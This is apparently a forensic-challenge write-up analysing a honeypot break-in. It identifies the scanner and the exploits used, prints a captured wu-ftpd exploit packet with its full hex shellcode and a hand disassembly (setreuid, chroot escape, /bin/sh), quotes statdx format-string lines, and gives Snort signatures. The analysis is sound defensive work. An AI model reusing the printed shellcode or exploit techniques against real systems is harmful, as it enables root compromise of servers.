Max Vision <vision@whitehats.com>

QUESTION #1: Can you name the FTP scanning tool?

Job was right, it is almost certainly the "myscan" scanner written by 
Wahnsinn.  I looked at the code, and there are numerous clues that this was 
the culprit (or similar code by same author).  This german scanner performs 
single-packet OS fingerprinting based on a table of tcp window sizes.  It 
has the following peculiarities/clues: initial ttl set to 255, tcp window 
size 0x200, zero tcp ack, and conspicuous source port of 10101.

from myscan.c:
  ip_header->ttl      = 255;
  tcp_header->th_win  = htons(512);
  tcp_header->th_ack  = htonl(0);

from myscan.h:
  #define SRC_PORT    10101    /* Client Port   */

http://people.blinx.de/wahn/



### QUESTION 2:  What does this FTP exploit achieve?  Does it open a port, 
                 create a shell, add a user account?

Basically it sets the real and effective userid to root, attempts a chroot escape, 
and spawns a shell to replace the exploited daemon.

Ah, I have since found the exact exploit, venglin did indeed release an 
update to bobek.c, which now has the exact matching shellcode. (update 
dated august 5th 2000, but it wasn't released until recently).. I didn't 
see the update because the filename was kept the same.

I had a look at the exploit capture and manually disassembled it.  It
basically sets the real and effective uid to root, then tries to
break any possible chroot jail, then execs /bin/sh.  This is pretty
much literally exactly what it does, nothing more.  Well, what it
would have done if the exploit worked - it appears from the packet
captures you have up that it was not successful.
 
The exploit is interesting to me for a few reasons: the shellcode
isn't   public (it's not in my archive), and someone has tacked on 
an invalid email address at the end of it.  The name "venglin" is a 
likely exploit   author (especially since he released a public remote 
wuftp exploit) but the domain is broken and not likely to have ever 
been valid.  This is likely a private exploit or a version that had 
a very small circulation.  I have seen extremely similar functionality in
shellcode before, but not quite the same coding.

the following is basically the exploit packet in question except that
I just started separating out the hex into the assembly opcodes..

12/09-01:22:31.167035 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53476  DF
*****PA* Seq: 0x33BC72AD   Ack: 0x110CE81E   Win: 0x7D78
TCP Options => NOP NOP TS: 126045057 105803098 
50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90  PASS ...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 
... and the code started here so I manually translate below:

(forgive my mish-mash of att/intel style commenting, just note the
syscalls :)

31 C0		xor eax,eax
31 DB		xor ebx,ebx
31 C9		xor ecx,ecx
B0 46		mov al,0x46		setreuid()
CD 80		int 0x80

31 C0		xor eax,eax
31 DB		xor ebx,ebx
43		inc ebx
89 D9		movl %ebx, %ecx
41		incl %ecx
B0 3F		movb $0x3f, %al		dup2()
CD 80		int 0x80

EB 6B		jmp SOMEWHERE
5E		popl %esi
31 C0		xor eax,eax
31 C9		xor ecx,ecx
8D 5E 01	leal 0x01(%esi), %ebx
88 46 04	movb %al, 0x04(%esi)
66 B9 FF FF	movw $0xffff, %cx
01 
B0 27		movb $0x27, %al		mkdir()
CD 80		int 0x80

31 C0		xor eax,eax
8D 5E 01	leal 0x01(%esi), %ebx
B0 3D		movb $0x3d, %al		chroot()
CD 80		int 0x80

31 C0		xor eax,eax
31 DB		xor ebx,ebx
8D 5E 08	leal 0x08(%esi), %ebx
89 43 02	movl %eax, 0x02(%ebx)
31 C9		xorl   %ecx,%ecx
FE C9		(dunno)
31 C0		xor eax,eax
8D 5E 08	leal 0x08(%esi), %ebx
B0 0C		movb $0x0c, %al		chdir()
CD 80		int 0x80

FE C9		(dunno)
75 F3		jnz SOMEWHERE
31 C0		xor eax,eax
88 46 09	movb %al, 0x09(%esi)
8D 5E 08	leal 0x08(%esi), %ebx
B0 3D		movb $0x3d, %al		chroot()
CD 80		int 0x80

FE 0E		(dunno)
B0 30		movb $0x08, %al
FE C8		(dunno)
88 46 04	movb %al, 0x04(%esi)
31 C0		xor eax,eax
88 46 07	movb %al, 0x07(%esi)
89 76 08	movl %esi, 0x08(%esi)
89 46 0C	movl %eax, 0x0c(%esi)
89 F3		movl %esi, %ebx
8D 4E 08	leal 0x08(%esi),%ecx
8D 56 0C	leal 0x0c(%esi),%edx
B0 0B		movb $0x0b, %al		execve()
CD 80		int 0x80

31 C0		xor eax,eax
31 DB		xor ebx,ebx
B0 01		movb $0x01, %al		exit()
CD 80		int 0x80

E8 90		jmp SOMEWHERE
FF FF FF
FF FF FF 30 62 69 6E 30 73 68 31 2E 2E 31 31 76  ...0bin0sh1..11v
65 6E 67 6C 69 6E 40 6B 6F 63 68 61 6D 2E 6B 61  englin@kocham.ka
73 69 65 2E 63 6F 6D 0D 0A                       sie.com..


QUESTION #3: Is the FTP attack successful?

Nope.


QUESTION #4: What RPC service is exploited?
   The rpcinfo request is specifically asking for port information                                             
   for rpc service 1000024 (the hex code "01 86 B8") which corresponds                                         
   to rpc.statd.  In response, portmap replies with the UDP port number                                        
   931. The probe is the equivelent of `rpcinfo -u example.com 100024`.


QUESTION #5 Where in the exploit code below does the attacker bind a shell
            to port 39168?

I checked and the shellcode is an exact match for a published statd exploit 
called "statdx" by ron1n. (Non-ripped linux IA32 portbinding shellcode ; 
port: 39168 ; length: 133 bytes).  A newer version is available, perhaps 
the attacker will upgrade at some point :)

I suspect it is actually the first version of ron1n's statdx instead of the 
newer statdx2 but I don't have time to check just now.
from statdx.c:    tmp = sprintf(ptr, "%%%dx%%n", pad);
from statdx2.c:   ptr += sprintf(ptr, "%%%ldx%%hn", pad);


QUESTION #6 What two accounts are created, and what are the UID's?

user, uid 5000
sendmail, uid 0


// Summary: OS indentification/portscan : "myscan" by Wahnsinn
             failed ftp exploit : "PanBobek v1.1" by Venglin
             succesful statd    : "statdx" (first version) by Ron1n

It's really hard to say if there is a connection between the two 
attacks.  The Canadian IP address that tried the ftp exploit could be a 
totally different person than the successful exploiter coming from the 
Texas IP address.

Here are some signatures to detect these specific attacks in the future.

alert TCP $EXTERNAL 10101 -> $INTERNAL any (msg: "IDS439/probe-myscan"; 
ttl: >220; ack: 0; flags: S;)
alert TCP $EXTERNAL any -> $INTERNAL 21 (msg: 
"IDS440/ftp-wuftp260-linux-venglin-parbobek"; flags: AP; content: 
"|2e2e3131|venglin@";)
alert TCP $EXTERNAL any -> $INTERNAL any (msg: "IDS442/rpc-statdx-exploit"; 
flags: AP; content: "/bin|c74604|/sh";)

:)